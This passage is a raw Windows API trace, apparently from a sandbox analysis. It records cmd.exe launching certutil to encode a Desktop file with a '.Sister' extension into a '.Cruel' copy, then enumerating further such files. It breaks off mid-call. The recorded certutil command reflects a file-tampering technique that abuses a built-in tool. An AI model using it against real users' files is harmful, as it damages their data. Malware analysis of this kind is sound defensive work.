_BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0219.814] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0219.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0219.815] GetFileType (hFile=0x50) returned 0x2 [0219.815] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0219.815] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0219.815] _get_osfhandle (_FileHandle=1) returned 0x50 [0219.815] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0219.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0219.816] GetFileType (hFile=0x50) returned 0x2 [0219.816] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0219.816] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0219.816] _get_osfhandle (_FileHandle=1) returned 0x50 [0219.816] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed937ad00*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed937ad00*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0219.817] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"AiNxYR.mp4.Sister\" \"AiNxYR.mp4.Cruel\" ") returned 48 [0219.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0219.817] GetFileType (hFile=0x50) returned 0x2 [0219.817] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0219.817] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0219.817] _get_osfhandle (_FileHandle=1) returned 0x50 [0219.817] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x30, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x30) returned 1 [0219.818] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0219.818] _get_osfhandle (_FileHandle=1) returned 0x50 [0219.818] GetFileType (hFile=0x50) returned 0x2 [0219.818] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0219.818] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0219.819] _get_osfhandle (_FileHandle=1) returned 0x50 [0219.819] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0219.824] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0219.824] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0219.825] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0219.825] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0219.825] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0219.825] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0219.825] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0219.825] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0219.825] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0219.825] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0219.825] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0219.825] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0219.825] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0219.825] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0219.825] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0219.825] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0219.825] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0219.825] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0219.825] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0219.825] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0219.825] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0219.825] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0219.825] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0219.825] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0219.825] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0219.825] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0219.825] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0219.825] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0219.825] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0219.825] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0219.826] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0219.826] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0219.826] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0219.826] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0219.826] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0219.826] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0219.826] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0219.826] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0219.826] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0219.826] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0219.826] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0219.826] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0219.826] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0219.826] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0219.826] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0219.826] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0219.826] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0219.826] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0219.826] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0219.826] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0219.826] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0219.826] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0219.826] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0219.826] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0219.826] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0219.827] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0219.827] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0219.827] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0219.827] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0219.827] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0219.827] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0219.827] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0219.827] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0219.827] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0219.827] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0219.827] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0219.827] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0219.827] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0219.827] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0219.827] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0219.827] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0219.827] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0219.827] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0219.827] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0219.827] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0219.827] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0219.827] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0219.827] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0219.827] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0219.828] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0219.828] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0219.828] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0219.828] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0219.828] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0219.828] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0219.828] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0219.828] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0219.828] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0219.828] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0219.828] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0219.828] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0219.828] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0219.828] ??_V@YAXPEAX@Z () returned 0x1 [0219.828] GetProcessHeap () returned 0x21ed8c70000 [0219.828] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cc97c0 [0219.828] GetProcessHeap () returned 0x21ed8c70000 [0219.829] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x82) returned 0x21ed93790c0 [0219.829] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0219.829] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0219.829] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0219.829] GetProcessHeap () returned 0x21ed8c70000 [0219.829] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed8cd97b0 [0219.830] SetErrorMode (uMode=0x0) returned 0x0 [0219.830] SetErrorMode (uMode=0x1) returned 0x0 [0219.830] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed8cd97c0, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0219.830] SetErrorMode (uMode=0x0) returned 0x1 [0219.830] GetProcessHeap () returned 0x21ed8c70000 [0219.831] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cd97b0, Size=0x52) returned 0x21ed8cd97b0 [0219.831] GetProcessHeap () returned 0x21ed8c70000 [0219.831] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cd97b0) returned 0x52 [0219.831] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0219.831] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0219.831] GetProcessHeap () returned 0x21ed8c70000 [0219.831] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d64860 [0219.831] GetProcessHeap () returned 0x21ed8c70000 [0219.831] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8d66830 [0219.831] GetProcessHeap () returned 0x21ed8c70000 [0219.831] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d66830, Size=0x1be) returned 0x21ed8d66830 [0219.831] GetProcessHeap () returned 0x21ed8c70000 [0219.831] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66830) returned 0x1be [0219.831] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0219.831] GetProcessHeap () returned 0x21ed8c70000 [0219.831] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d427f0 [0219.831] GetProcessHeap () returned 0x21ed8c70000 [0219.831] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d427f0, Size=0x7e) returned 0x21ed8d427f0 [0219.831] GetProcessHeap () returned 0x21ed8c70000 [0219.831] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d427f0) returned 0x7e [0219.831] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.831] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0219.832] GetLastError () returned 0x2 [0219.832] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.832] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0219.832] GetLastError () returned 0x2 [0219.832] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.832] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ca60 [0219.832] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0219.833] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0219.833] GetLastError () returned 0x2 [0219.833] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ca60 [0219.833] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0219.833] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0219.833] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0219.833] ??_V@YAXPEAX@Z () returned 0x1 [0219.833] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0219.834] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0219.834] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0219.834] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0219.834] GetProcessHeap () returned 0x21ed8c70000 [0219.834] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45e30 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0219.834] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0219.835] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0219.835] GetProcessHeap () returned 0x21ed8c70000 [0219.835] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e30) returned 1 [0219.835] GetProcessHeap () returned 0x21ed8c70000 [0219.835] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95740 [0219.835] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0219.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0219.835] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0219.836] _get_osfhandle (_FileHandle=0) returned 0x4c [0219.836] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0219.836] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"AiNxYR.mp4.Sister\" \"AiNxYR.mp4.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"AiNxYR.mp4.Sister\" \"AiNxYR.mp4.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"AiNxYR.mp4.Sister\" \"AiNxYR.mp4.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xd74, dwThreadId=0xd90)) returned 1 [0219.859] CloseHandle (hObject=0xa4) returned 1 [0219.859] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0219.860] GetProcessHeap () returned 0x21ed8c70000 [0219.860] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0219.860] GetEnvironmentStringsW () returned 0x21ed9980080* [0219.860] GetProcessHeap () returned 0x21ed8c70000 [0219.860] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0219.860] FreeEnvironmentStringsA (penv="=") returned 1 [0219.860] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0220.228] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0220.228] CloseHandle (hObject=0xa8) returned 1 [0220.228] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0220.228] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0220.228] GetProcessHeap () returned 0x21ed8c70000 [0220.228] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0220.228] GetEnvironmentStringsW () returned 0x21ed9980080* [0220.228] GetProcessHeap () returned 0x21ed8c70000 [0220.228] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0220.229] FreeEnvironmentStringsA (penv="=") returned 1 [0220.229] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0220.229] GetProcessHeap () returned 0x21ed8c70000 [0220.229] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0220.229] GetEnvironmentStringsW () returned 0x21ed9980080* [0220.229] GetProcessHeap () returned 0x21ed8c70000 [0220.229] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0220.229] FreeEnvironmentStringsA (penv="=") returned 1 [0220.229] GetProcessHeap () returned 0x21ed8c70000 [0220.229] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95740) returned 1 [0220.229] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0220.229] ??_V@YAXPEAX@Z () returned 0x1 [0220.229] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x301a1f60, ftCreationTime.dwHighDateTime=0x1d5eb5a, ftLastAccessTime.dwLowDateTime=0xb6aa1d60, ftLastAccessTime.dwHighDateTime=0x1d5ee1a, ftLastWriteTime.dwLowDateTime=0xb6aa1d60, ftLastWriteTime.dwHighDateTime=0x1d5ee1a, nFileSizeHigh=0x0, nFileSizeLow=0x7af5, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="d_S3PO8QIc.gif.Sister", cAlternateFileName="")) returned 1 [0220.229] GetProcessHeap () returned 0x21ed8c70000 [0220.229] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9980da0, Size=0x20e) returned 0x21ed9980da0 [0220.229] GetProcessHeap () returned 0x21ed8c70000 [0220.229] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9980da0) returned 0x20e [0220.229] GetProcessHeap () returned 0x21ed8c70000 [0220.229] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937af00 [0220.229] GetProcessHeap () returned 0x21ed8c70000 [0220.229] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937af00, Size=0x58) returned 0x21ed937af00 [0220.229] GetProcessHeap () returned 0x21ed8c70000 [0220.229] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937af00) returned 0x58 [0220.229] GetProcessHeap () returned 0x21ed8c70000 [0220.229] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed937af70 [0220.229] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0220.230] GetProcessHeap () returned 0x21ed8c70000 [0220.230] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3c) returned 0x21ed8c7c160 [0220.230] ??_V@YAXPEAX@Z () returned 0x1 [0220.230] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0220.230] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cb80 [0220.230] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0220.230] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, 